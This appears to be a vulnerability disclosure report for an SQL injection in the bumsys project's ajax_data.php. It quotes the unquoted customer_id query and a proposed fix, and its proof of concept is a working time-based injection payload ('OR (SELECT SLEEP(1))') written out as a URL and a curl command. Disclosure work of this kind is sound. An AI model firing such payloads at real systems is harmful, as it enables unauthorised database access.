bumsys

Valid

Reported on

Feb 28th 2023

Description

There exists an SQL injection affecting the customer_id parameter located in the file core/ajax/ajax_data.php

Let's take a look at the following code: https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L537

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

The core problem is that, even though the function safe_input() is used in an effort to sanitize the customer_id variable, as seen here https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L447

    $customer_id = isset($_GET["customer_id"]) ? safe_input($_GET["customer_id"]) : "";

The query itself however, assumes customer_id is always an integer, but this isnt enforced by quotes. Thus allowing us to inject SQL statements without ever needing to inject a quote.

Fix

change

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

                    where stock_product_id = '{$product_id}' and sales_customer_id = '{$customer_id}' and product_stock.is_trash = 0

Proof of Concept

Make a GET-request to http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1)) with a valid session and a valid CSRF-token and observe the delay introduced by calling SLEEP().

curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=9vrsravv229bb68gm7ejpldhoj;' -H 'X-CSRF-TOKEN: 5f185b523d036a55a162dbf63d8b45b600275e92' --url "http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))"